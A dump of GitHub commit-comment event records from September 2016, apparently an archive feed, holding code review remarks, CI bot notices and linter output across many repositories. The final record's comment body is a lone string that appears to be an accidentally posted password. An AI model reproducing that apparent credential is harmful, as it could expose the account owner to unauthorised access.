{"id":"4568513053","type":"CommitCommentEvent","actor":{"login":"fred3m"},"repo":{"name":"lsst/pipe_tasks"},"payload":{"comment":{"id":19037520,"position":18,"line":187,"path":"tests/testProcessCcd.py","commit_id":"093032395ae62bb8a3a5fb710b9c46631d221834","created_at":"2016-09-15T14:40:20Z","updated_at":"2016-09-15T14:40:20Z","body":"I'll fix this once I can actually build and test the package. I'm not sure I like x!=x to define a NaN value, so I'm curious to see what types of values it detects as NaN (np.nan, None, something else?) so this will be a better defined function."}},"created_at":"2016-09-15T14:40:20Z"}
{"id":"4568514265","type":"CommitCommentEvent","actor":{"login":"jabbourb"},"repo":{"name":"cyrilibrahim/inf8702_tp2"},"payload":{"comment":{"id":19037523,"position":null,"line":null,"path":null,"commit_id":"7599a536cdc9f5ee97fa824051240f9805dafd8a","created_at":"2016-09-15T14:40:31Z","updated_at":"2016-09-15T14:40:31Z","body":"Might need to clip MV matrix instead of V only"}},"created_at":"2016-09-15T14:40:31Z"}
{"id":"4568514269","type":"CommitCommentEvent","actor":{"login":"Mazda--"},"repo":{"name":"DirtyUnicorns/android_packages_apps_Settings"},"payload":{"comment":{"id":19037524,"position":null,"line":null,"path":null,"commit_id":"2cc5f0457adfb02100c3c030badb5b30eeaa2afa","created_at":"2016-09-15T14:40:32Z","updated_at":"2016-09-15T14:40:32Z","body":"Awesome @xyyx thanks!\r\n\r\nBeen busy today so this makes it easier :-)"}},"created_at":"2016-09-15T14:40:32Z"}
{"id":"4568521566","type":"CommitCommentEvent","actor":{"login":"timj"},"repo":{"name":"lsst/pipe_tasks"},"payload":{"comment":{"id":19037539,"position":18,"line":187,"path":"tests/testProcessCcd.py","commit_id":"093032395ae62bb8a3a5fb710b9c46631d221834","created_at":"2016-09-15T14:41:38Z","updated_at":"2016-09-15T14:41:38Z","body":"`x != x` is pretty much the definition of NaN. I'll stop hovering now and let you sort out all the problems until it's review time."}},"created_at":"2016-09-15T14:41:38Z"}
{"id":"4568524770","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19037544,"position":26,"line":438,"path":"src/utils/polygon.cpp","commit_id":"955399765c62f1a37df6d822d22c882872d837d9","created_at":"2016-09-15T14:42:08Z","updated_at":"2016-09-15T14:42:08Z","body":"As I understand it, this piece of code allows for skipping one extra vertex ahead, if the two vertices ahead are closer?\r\n\r\nBut what happens if the next two vertices are blocked in some way?"}},"created_at":"2016-09-15T14:42:08Z"}
{"id":"4568527104","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19037557,"position":null,"line":null,"path":null,"commit_id":"20e8d8954742d738c91b35267f5f0b69c0b3c038","created_at":"2016-09-15T14:42:31Z","updated_at":"2016-09-15T14:42:31Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1013](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13359&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-15T14:42:31Z"}
{"id":"4568528593","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"IndoorPosSquad/dw1000_firmware"},"payload":{"comment":{"id":19037563,"position":null,"line":null,"path":null,"commit_id":"6f95c18a4c5612d40e12ed5bcb1dcc09b1355b5d","created_at":"2016-09-15T14:42:44Z","updated_at":"2016-09-15T14:42:44Z","body":"Hello @zhfuzzy , I admire your work.I am working on a project which requires me to interface DW1000 with pixhawk(it contains 32bit ARM cortex M4 board),so I think you can help for that.\r\nI want to get range data from DW1000(interfaced with pixhawk) with respect to other four DW1000\r\nOther 4 DW1000 I have interfaced with arduino but have no idea how to do that\r\nI dont know how to make a pin on pixhawk(ARM cortex) to be a interrupt pin so that it can be connected to sensor interrupt pin"}},"created_at":"2016-09-15T14:42:44Z"}
{"id":"4568531421","type":"CommitCommentEvent","actor":{"login":"pexcn"},"repo":{"name":"CyanogenMod/android_system_core"},"payload":{"comment":{"id":19037583,"position":null,"line":null,"path":null,"commit_id":"2cdbe550a6739966b0237a27e4660169a59f2662","created_at":"2016-09-15T14:43:11Z","updated_at":"2016-09-15T14:43:11Z","body":"https://review.cyanogenmod.org/162174"}},"created_at":"2016-09-15T14:43:11Z"}
{"id":"4568532864","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19037590,"position":213,"line":213,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageExchangeStore.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T14:43:23Z","updated_at":"2016-09-15T14:43:23Z","body":"I don't know if this is a problem, but we don't check in the observationStore to see if the token is already used."}},"created_at":"2016-09-15T14:43:23Z"}
{"id":"4568535201","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/gridlook"},"payload":{"comment":{"id":19037601,"position":6,"line":41,"path":"README.md","commit_id":"83fcf36c1b1aa5ea5331c3ac198e548cfc9bdb7b","created_at":"2016-09-15T14:43:42Z","updated_at":"2016-09-15T14:43:42Z","body":"Would it be helpful to mention something like \"Suitable for use together with the JWT authentication\" or is that getting too specific? Maybe anyone who makes use of the JWT will also figure out what this is good for."}},"created_at":"2016-09-15T14:43:42Z"}
{"id":"4568543713","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19037641,"position":null,"line":null,"path":null,"commit_id":"da90c15c9bdb57b3909856dfd208c5ae72e84327","created_at":"2016-09-15T14:45:03Z","updated_at":"2016-09-15T14:45:03Z","body":"[tests/testthat/test_abc_smc_nltt.R:36:44:](https://github.com/richelbilderbeek/nLTT/blob/da90c15c9bdb57b3909856dfd208c5ae72e84327/tests/testthat/test_abc_smc_nltt.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​  ML <- stats::optimize(f = tofit, interval=c(0, 1))\n                                          ~^~\n```\n[tests/testthat/test_abc_smc_nltt.R:48:1:](https://github.com/richelbilderbeek/nLTT/blob/da90c15c9bdb57b3909856dfd208c5ae72e84327/tests/testthat/test_abc_smc_nltt.R#L48) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_abc_smc_nltt.R:49:9:](https://github.com/richelbilderbeek/nLTT/blob/da90c15c9bdb57b3909856dfd208c5ae72e84327/tests/testthat/test_abc_smc_nltt.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​  if (1 ==2) {\n        ^~~\n```\n[tests/testthat/test_abc_smc_nltt.R:52:1:](https://github.com/richelbilderbeek/nLTT/blob/da90c15c9bdb57b3909856dfd208c5ae72e84327/tests/testthat/test_abc_smc_nltt.R#L52) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_abc_smc_nltt.R:54:1:](https://github.com/richelbilderbeek/nLTT/blob/da90c15c9bdb57b3909856dfd208c5ae72e84327/tests/testthat/test_abc_smc_nltt.R#L54) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_abc_smc_nltt.R:60:1:](https://github.com/richelbilderbeek/nLTT/blob/da90c15c9bdb57b3909856dfd208c5ae72e84327/tests/testthat/test_abc_smc_nltt.R#L60) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```"}},"created_at":"2016-09-15T14:45:03Z"}
{"id":"4568544403","type":"CommitCommentEvent","actor":{"login":"Shougo"},"repo":{"name":"Shougo/neovim"},"payload":{"comment":{"id":19037648,"position":6,"line":766,"path":"src/nvim/fold.c","commit_id":"2cf93446bf3f25a894f92706b3a8dea065d97320","created_at":"2016-09-15T14:45:11Z","updated_at":"2016-09-15T14:45:11Z","body":"compl_busy is set in opening popup menu only.\r\nThe slowness is in all of insert mode and completion state.\r\nSo, the compl_busy check is not enough."}},"created_at":"2016-09-15T14:45:11Z"}
{"id":"4568545854","type":"CommitCommentEvent","actor":{"login":"hjelmn"},"repo":{"name":"open-mpi/ompi"},"payload":{"comment":{"id":19037657,"position":null,"line":null,"path":null,"commit_id":"e3b3e52fddafd1490e0ddbb86885ed4ffff44835","created_at":"2016-09-15T14:45:26Z","updated_at":"2016-09-15T14:45:26Z","body":"Should PR to 2.0.3 and 2.1.0 if you haven't already."}},"created_at":"2016-09-15T14:45:26Z"}
{"id":"4568549657","type":"CommitCommentEvent","actor":{"login":"petro-rudenko"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19037672,"position":27,"line":36,"path":"jvm-packages/xgboost4j-spark/src/main/scala/ml/dmlc/xgboost4j/scala/spark/XGBoostModel.scala","commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-15T14:45:59Z","updated_at":"2016-09-15T14:45:59Z","body":"ProbabilisticClassifier is just predictor that has `$(probabilityCol)` parameter. In regressor you don't need that paramuter, but may need other parameters specific to regression (like confidence interval, or whatever). That's why spark has 2 types of models for the same algorithm (e.g. GBTClassifier, GBTRegressor)"}},"created_at":"2016-09-15T14:45:59Z"}
{"id":"4568556496","type":"CommitCommentEvent","actor":{"login":"hostep"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":19037707,"position":139,"line":227,"path":"app/code/Magento/Deploy/Console/Command/DeployStaticContentCommand.php","commit_id":"7800e3791f71dc09d854581a2d8440b8100f593c","created_at":"2016-09-15T14:47:03Z","updated_at":"2016-09-15T14:47:03Z","body":"Woohoow! 😄 "}},"created_at":"2016-09-15T14:47:03Z"}
{"id":"4568558596","type":"CommitCommentEvent","actor":{"login":"santaclauss"},"repo":{"name":"Datatekniikka/TaistoCMS"},"payload":{"comment":{"id":19037720,"position":null,"line":null,"path":null,"commit_id":"4518983add7d95d75176bc855517740c6838ce6a","created_at":"2016-09-15T14:47:25Z","updated_at":"2016-09-15T14:47:25Z","body":"\r\n+(1, '.home', '<h1> Tervemenoa  sivulle! </h1>'),"}},"created_at":"2016-09-15T14:47:25Z"}
{"id":"4568560137","type":"CommitCommentEvent","actor":{"login":"aroxby"},"repo":{"name":"ZombieRoxtar/LxssLoader"},"payload":{"comment":{"id":19037724,"position":99,"line":99,"path":"LxssLoader/lxss.h","commit_id":"4cc84b9d2e1e5ce14f1e74b6f0cc467cae185b60","created_at":"2016-09-15T14:47:39Z","updated_at":"2016-09-15T14:47:39Z","body":"Maybe leave a comment a top saying where this file came from?"}},"created_at":"2016-09-15T14:47:39Z"}
{"id":"4568562905","type":"CommitCommentEvent","actor":{"login":"Kalkstein"},"repo":{"name":"Besac25/ww1"},"payload":{"comment":{"id":19037731,"position":null,"line":null,"path":null,"commit_id":"e6bd798b7cbda5e52e474e9973ec3addbb6d8a69","created_at":"2016-09-15T14:48:02Z","updated_at":"2016-09-15T14:48:02Z","body":"We will provide change lists for every string we modified next with next update. You may translate these to French and then ask for Pull Request.\r\nIf you don't create a Pull Request, we are not able to integrate your work."}},"created_at":"2016-09-15T14:48:02Z"}
{"id":"4568563546","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19037734,"position":213,"line":213,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageExchangeStore.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T14:48:10Z","updated_at":"2016-09-15T14:48:10Z","body":"Very good point. I think we need to do that as well."}},"created_at":"2016-09-15T14:48:10Z"}
{"id":"4568564023","type":"CommitCommentEvent","actor":{"login":"mebsim"},"repo":{"name":"mebsim/pygameGame"},"payload":{"comment":{"id":19037735,"position":null,"line":null,"path":null,"commit_id":"94424105a144da66861d6720e422622ad0422520","created_at":"2016-09-15T14:48:14Z","updated_at":"2016-09-15T14:48:14Z","body":"This fixes the shooting infinite bullets that just pop up out of no where."}},"created_at":"2016-09-15T14:48:14Z"}
{"id":"4568567601","type":"CommitCommentEvent","actor":{"login":"jrah"},"repo":{"name":"matthewmorek/wfp-volunteer"},"payload":{"comment":{"id":19037745,"position":null,"line":null,"path":null,"commit_id":"381854ed6482a58feebed83c973e7e4f9aeb9c5c","created_at":"2016-09-15T14:48:44Z","updated_at":"2016-09-15T14:48:44Z","body":"Fix #1 "}},"created_at":"2016-09-15T14:48:44Z"}
{"id":"4568570355","type":"CommitCommentEvent","actor":{"login":"aroxby"},"repo":{"name":"ZombieRoxtar/LxssLoader"},"payload":{"comment":{"id":19037751,"position":76,"line":76,"path":"LxssLoader/main.cpp","commit_id":"4cc84b9d2e1e5ce14f1e74b6f0cc467cae185b60","created_at":"2016-09-15T14:49:10Z","updated_at":"2016-09-15T14:49:10Z","body":"Are you sure this step is needed?"}},"created_at":"2016-09-15T14:49:10Z"}
{"id":"4568571627","type":"CommitCommentEvent","actor":{"login":"drkutuzov"},"repo":{"name":"s123594/modellingProject"},"payload":{"comment":{"id":19037753,"position":null,"line":null,"path":null,"commit_id":"f619d85489d523abe82b709a6d5c7a14d83d70cd","created_at":"2016-09-15T14:49:22Z","updated_at":"2016-09-15T14:49:22Z","body":"Finally -- if you compare the lines profiles before and after correction you have removed the artefacts but all values where there were no artefacts also slightly increased in intensity and we don't really want to do that. We may want only to correct \"wrong\" regions by addind a constant to them and dont touch other parts of an image. Maybe you can try instead identify the lines where the correction needed and then add correction only to them. Correction function then will be: F(line) = 0 if no correction needed, const if correction needed."}},"created_at":"2016-09-15T14:49:22Z"}
{"id":"4568572008","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19037755,"position":6,"line":902,"path":"truffle/src/main/java/org/jruby/truffle/core/kernel/KernelNodes.java","commit_id":"7ddb76a5e96ccf677241bf605da7ee8ac403f9ed","created_at":"2016-09-15T14:49:25Z","updated_at":"2016-09-15T14:49:25Z","body":"Maybe just `MURMUR_SEED`?"}},"created_at":"2016-09-15T14:49:25Z"}
{"id":"4568573854","type":"CommitCommentEvent","actor":{"login":"edouardouvrard"},"repo":{"name":"playmoweb/Moya-ObjectMapper"},"payload":{"comment":{"id":19037757,"position":null,"line":null,"path":null,"commit_id":"2cfdf05c2c57b0d0d52e0ea819d384a0d4c5bc85","created_at":"2016-09-15T14:49:41Z","updated_at":"2016-09-15T14:49:41Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;lo1EIdRL&#x2F;1-sdfsqdfqsdf\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> sdfsqdfqsdf</a>"}},"created_at":"2016-09-15T14:49:41Z"}
{"id":"4568577850","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19037766,"position":null,"line":null,"path":null,"commit_id":"c354f06964f7bb84ac83da7017085b92e384a302","created_at":"2016-09-15T14:50:20Z","updated_at":"2016-09-15T14:50:20Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/467/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-15T14:50:20Z"}
{"id":"4568579945","type":"CommitCommentEvent","actor":{"login":"CodingCat"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19037771,"position":27,"line":36,"path":"jvm-packages/xgboost4j-spark/src/main/scala/ml/dmlc/xgboost4j/scala/spark/XGBoostModel.scala","commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-15T14:50:40Z","updated_at":"2016-09-15T14:50:40Z","body":"you mean have two separated classes to extend ProbabilisticClassifier and Regressor respectively?\r\n\r\n"}},"created_at":"2016-09-15T14:50:40Z"}
{"id":"4568580233","type":"CommitCommentEvent","actor":{"login":"aviau"},"repo":{"name":"syncthing/syncthing"},"payload":{"comment":{"id":19037773,"position":null,"line":null,"path":null,"commit_id":"139e9b144eba1f94f4d847a5c234c825a6d09078","created_at":"2016-09-15T14:50:42Z","updated_at":"2016-09-15T14:50:42Z","body":"> It wasn't arm specific either.\r\n\r\nYeah thats why I renamed the issue title. Sometimes the Debian CI runs stuff on ARM and reports it to be as an arm bug but its related to the fact that the lib wasn't yet updated when it tested on amd64."}},"created_at":"2016-09-15T14:50:42Z"}
{"id":"4568586657","type":"CommitCommentEvent","actor":{"login":"rpsenski"},"repo":{"name":"OfficeDev/Project-REST-Basic-Operations"},"payload":{"comment":{"id":19037784,"position":null,"line":null,"path":null,"commit_id":"022cc2156157ff41450086e1cf5f07b55d6f2a8e","created_at":"2016-09-15T14:51:43Z","updated_at":"2016-09-15T14:51:43Z","body":"Formatting code in this UI is painful. Attaching a basic text file.\r\n[CodeSample_UpdateProjectCustomFieldValues-Rest.txt](https://github.com/OfficeDev/Project-REST-Basic-Operations/files/474911/CodeSample_UpdateProjectCustomFieldValues-Rest.txt)\r\n"}},"created_at":"2016-09-15T14:51:43Z"}
{"id":"4568589182","type":"CommitCommentEvent","actor":{"login":"sebcat"},"repo":{"name":"sebcat/move-literals"},"payload":{"comment":{"id":19037794,"position":31,"line":48,"path":"move-literals.lua","commit_id":"cca5e3b78a36d85848165fa1644af03bc05b74f1","created_at":"2016-09-15T14:52:06Z","updated_at":"2016-09-15T14:52:06Z","body":"Hmm, the substitution capture is probably a NOOP and can be removed. I think it got left behind while refactoring"}},"created_at":"2016-09-15T14:52:06Z"}
{"id":"4568589219","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19037795,"position":328,"line":328,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageExchangeStore.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T14:52:06Z","updated_at":"2016-09-15T14:52:06Z","body":"Why this one is not in the double synchronized block ? `ongoingExchanges.clear()`"}},"created_at":"2016-09-15T14:52:06Z"}
{"id":"4568592896","type":"CommitCommentEvent","actor":{"login":"svanburen"},"repo":{"name":"svanburen/dotfiles"},"payload":{"comment":{"id":19037811,"position":null,"line":null,"path":null,"commit_id":"6fb676ad7330fc22137777783f53b398910225de","created_at":"2016-09-15T14:52:40Z","updated_at":"2016-09-15T14:52:40Z","body":"What part of it?"}},"created_at":"2016-09-15T14:52:40Z"}
{"id":"4568593760","type":"CommitCommentEvent","actor":{"login":"iancward"},"repo":{"name":"chef/chef"},"payload":{"comment":{"id":19037814,"position":null,"line":null,"path":null,"commit_id":"6fc09c47b465c89de988cc39c52da157ec0a51d7","created_at":"2016-09-15T14:52:47Z","updated_at":"2016-09-15T14:52:47Z","body":"We just ran into this; will 12.14.65 be released to the the yum package repository?"}},"created_at":"2016-09-15T14:52:47Z"}
{"id":"4568595150","type":"CommitCommentEvent","actor":{"login":"aroxby"},"repo":{"name":"ZombieRoxtar/LxssLoader"},"payload":{"comment":{"id":19037816,"position":124,"line":124,"path":"LxssLoader/main.cpp","commit_id":"4cc84b9d2e1e5ce14f1e74b6f0cc467cae185b60","created_at":"2016-09-15T14:53:00Z","updated_at":"2016-09-15T14:53:00Z","body":"Maybe not setting this up is why interactive programs fail?"}},"created_at":"2016-09-15T14:53:00Z"}
{"id":"4568602675","type":"CommitCommentEvent","actor":{"login":"filipeforattini"},"repo":{"name":"gilsonsouzah/laracors"},"payload":{"comment":{"id":19037854,"position":null,"line":null,"path":null,"commit_id":"aaac7f1d9acba233a3e797c1b7b953127559e01a","created_at":"2016-09-15T14:54:12Z","updated_at":"2016-09-15T14:54:12Z","body":"You dont need this requirement of PHP ^5.5 in this package :)\r\nGood stuff tho"}},"created_at":"2016-09-15T14:54:12Z"}
{"id":"4568603279","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19037858,"position":343,"line":343,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageExchangeStore.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T14:54:17Z","updated_at":"2016-09-15T14:54:17Z","body":"Same comment as BaseMatcher about threadsafeness."}},"created_at":"2016-09-15T14:54:17Z"}
{"id":"4568604901","type":"CommitCommentEvent","actor":{"login":"Shougo"},"repo":{"name":"Shougo/unite.vim"},"payload":{"comment":{"id":19037865,"position":null,"line":null,"path":null,"commit_id":"f07a1a00963f4b0aa336f37e9a11394dbd85c015","created_at":"2016-09-15T14:54:34Z","updated_at":"2016-09-15T14:54:34Z","body":"https://github.com/Shougo/denite.nvim/commit/78b968fa9e65583d9b8e47f01753e484a83518d0"}},"created_at":"2016-09-15T14:54:34Z"}
{"id":"4568606519","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19037873,"position":null,"line":null,"path":null,"commit_id":"20e8d8954742d738c91b35267f5f0b69c0b3c038","created_at":"2016-09-15T14:54:48Z","updated_at":"2016-09-15T14:54:48Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1013](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13359&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 238, ignored: 3 Build time: 00:12:17"}},"created_at":"2016-09-15T14:54:48Z"}
{"id":"4568608071","type":"CommitCommentEvent","actor":{"login":"silverkorn"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":19037880,"position":null,"line":null,"path":null,"commit_id":"a4156f1f0a69bcf4d7c1f43550a39a76cc389e0a","created_at":"2016-09-15T14:55:01Z","updated_at":"2016-09-15T14:55:01Z","body":"Ok, thanks for the info!"}},"created_at":"2016-09-15T14:55:01Z"}
{"id":"4568608858","type":"CommitCommentEvent","actor":{"login":"gloomylego"},"repo":{"name":"skapix/mmcs-sfedu_compiler"},"payload":{"comment":{"id":19037883,"position":27,"line":80,"path":"Visitors.cs","commit_id":"b096725be32af4d888d7473be6cd31fb56f4416a","created_at":"2016-09-15T14:55:11Z","updated_at":"2016-09-15T14:55:11Z","body":"нужно посетить и этот узел\r\n`iNode.Condition.Accept(this);`"}},"created_at":"2016-09-15T14:55:11Z"}
{"id":"4568611038","type":"CommitCommentEvent","actor":{"login":"qyot27"},"repo":{"name":"psteinb/x264"},"payload":{"comment":{"id":19037889,"position":null,"line":null,"path":null,"commit_id":"570d14ae50a1a666d2f71280500dc93c73415957","created_at":"2016-09-15T14:55:32Z","updated_at":"2016-09-15T14:55:32Z","body":"Messing with dllimport/dllexport and X264_API_EXPORT macros in x264.h is probably guaranteed to make upstream reject this outright.  Just saying."}},"created_at":"2016-09-15T14:55:32Z"}
{"id":"4568613130","type":"CommitCommentEvent","actor":{"login":"sebcat"},"repo":{"name":"sebcat/move-literals"},"payload":{"comment":{"id":19037897,"position":38,"line":55,"path":"move-literals.lua","commit_id":"cca5e3b78a36d85848165fa1644af03bc05b74f1","created_at":"2016-09-15T14:55:51Z","updated_at":"2016-09-15T14:55:51Z","body":"It's anything that does not match any one byte, so yes :) It is the same as not matching 1. See http://www.inf.puc-rio.br/~roberto/lpeg/#op-unm"}},"created_at":"2016-09-15T14:55:51Z"}
{"id":"4568615937","type":"CommitCommentEvent","actor":{"login":"aroxby"},"repo":{"name":"ZombieRoxtar/LxssLoader"},"payload":{"comment":{"id":19037908,"position":34,"line":34,"path":"LxssLoader/main.cpp","commit_id":"4cc84b9d2e1e5ce14f1e74b6f0cc467cae185b60","created_at":"2016-09-15T14:56:18Z","updated_at":"2016-09-15T14:56:18Z","body":"Did you try:\r\n\r\n    int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR lpCmdLine, INT nCmdShow) {\r\n        return main(__argc, __argv);\r\n    }\r\n\r\n?"}},"created_at":"2016-09-15T14:56:18Z"}
{"id":"4568618714","type":"CommitCommentEvent","actor":{"login":"manilmaskey"},"repo":{"name":"ghrcdaac/cmr"},"payload":{"comment":{"id":19037916,"position":null,"line":null,"path":null,"commit_id":"7c2ca180261b3dd0e1a21d0f27da6128ff707cc3","created_at":"2016-09-15T14:56:44Z","updated_at":"2016-09-15T14:56:44Z","body":"@scisco - minor correction: it should be jupyter not juniper"}},"created_at":"2016-09-15T14:56:44Z"}
{"id":"4568623729","type":"CommitCommentEvent","actor":{"login":"BrianAlterman"},"repo":{"name":"BrianAlterman/SQL-InforLawson"},"payload":{"comment":{"id":19037926,"position":null,"line":null,"path":null,"commit_id":"6160ddba3e80de2719e9a9473ea3ff8471cbb7c3","created_at":"2016-09-15T14:57:31Z","updated_at":"2016-09-15T14:57:31Z","body":"Change 09152016"}},"created_at":"2016-09-15T14:57:31Z"}
{"id":"4568625606","type":"CommitCommentEvent","actor":{"login":"calaway"},"repo":{"name":"bfpepper/little-shop"},"payload":{"comment":{"id":19037932,"position":null,"line":null,"path":null,"commit_id":"63bd73e020ef61e87ff2854ab55371e491406871","created_at":"2016-09-15T14:57:48Z","updated_at":"2016-09-15T14:57:48Z","body":"I’m working on the logout card and I can’t remember how to do the very last step from this lesson last week, clearing the session. Do one of you remember? @NateAnderson1780?\r\n\r\nhttps://gist.github.com/rwarbelow/fc48a47d713103b3b66f\r\n\r\n"}},"created_at":"2016-09-15T14:57:48Z"}
{"id":"4568631166","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19037945,"position":2,"line":2,"path":"server/app/routes/products/products.js","commit_id":"a5fa5452131d50cb220a6985e37ed730358f2bd2","created_at":"2016-09-15T14:58:40Z","updated_at":"2016-09-15T14:58:40Z","body":"An alternative pattern is `var Product = db.model('product')`. Not necessary, just pointing it out."}},"created_at":"2016-09-15T14:58:40Z"}
{"id":"4568632273","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19037950,"position":null,"line":null,"path":null,"commit_id":"9337ceb520ff198ccc15360850bb796a46027faa","created_at":"2016-09-15T14:58:49Z","updated_at":"2016-09-15T14:58:49Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/468/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-15T14:58:49Z"}
{"id":"4568633690","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19037954,"position":9,"line":9,"path":"server/app/routes/products/products.js","commit_id":"a5fa5452131d50cb220a6985e37ed730358f2bd2","created_at":"2016-09-15T14:59:03Z","updated_at":"2016-09-15T14:59:03Z","body":"Don't forget error handling! `.catch(next)` is sufficient."}},"created_at":"2016-09-15T14:59:03Z"}
{"id":"4568636153","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19037961,"position":17,"line":17,"path":"server/app/routes/products/products.js","commit_id":"a5fa5452131d50cb220a6985e37ed730358f2bd2","created_at":"2016-09-15T14:59:27Z","updated_at":"2016-09-15T14:59:27Z","body":"err handling."}},"created_at":"2016-09-15T14:59:27Z"}
{"id":"4568637733","type":"CommitCommentEvent","actor":{"login":"1wheel"},"repo":{"name":"TheUpshot/prison-admissions"},"payload":{"comment":{"id":19037969,"position":null,"line":null,"path":null,"commit_id":"f95448240dafa279d2805c24d03ffa8554ba07c1","created_at":"2016-09-15T14:59:39Z","updated_at":"2016-09-15T14:59:39Z","body":"Yes, we've updated the map and added a correction the article: \r\n\r\n> An earlier version of a map with this article misstated the per capita prison admissions numbers for New Mexico counties. Most counties overstated the admission rate, while Otero and Luna Counties understated the rate. The average admission rate in New Mexico is 18.23 per 10,000 people, not 20.09.\r\n\r\n"}},"created_at":"2016-09-15T14:59:39Z"}
{"id":"4568638743","type":"CommitCommentEvent","actor":{"login":"petro-rudenko"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19037971,"position":27,"line":36,"path":"jvm-packages/xgboost4j-spark/src/main/scala/ml/dmlc/xgboost4j/scala/spark/XGBoostModel.scala","commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-15T14:59:46Z","updated_at":"2016-09-15T14:59:46Z","body":"Yes the same xgboost have for python (`XGBClassifier`, `XGBRegressor`) (actually spark ml API intended to follow sklearn API style)"}},"created_at":"2016-09-15T14:59:46Z"}
{"id":"4568640395","type":"CommitCommentEvent","actor":{"login":"man14637"},"repo":{"name":"man14637/cit270"},"payload":{"comment":{"id":19037972,"position":null,"line":null,"path":null,"commit_id":"aa192e73179c4a674f8107ada55799d1e97245d8","created_at":"2016-09-15T15:00:05Z","updated_at":"2016-09-15T15:00:05Z","body":"This class is base off of scripting languages. Perl, Javascript, Ruby, and more."}},"created_at":"2016-09-15T15:00:05Z"}
{"id":"4568641594","type":"CommitCommentEvent","actor":{"login":"man14637"},"repo":{"name":"man14637/cit270"},"payload":{"comment":{"id":19037976,"position":1,"line":1,"path":"README.md","commit_id":"aa192e73179c4a674f8107ada55799d1e97245d8","created_at":"2016-09-15T15:00:19Z","updated_at":"2016-09-15T15:00:19Z","body":"h@QbrWe2Mc8!"}},"created_at":"2016-09-15T15:00:19Z"}
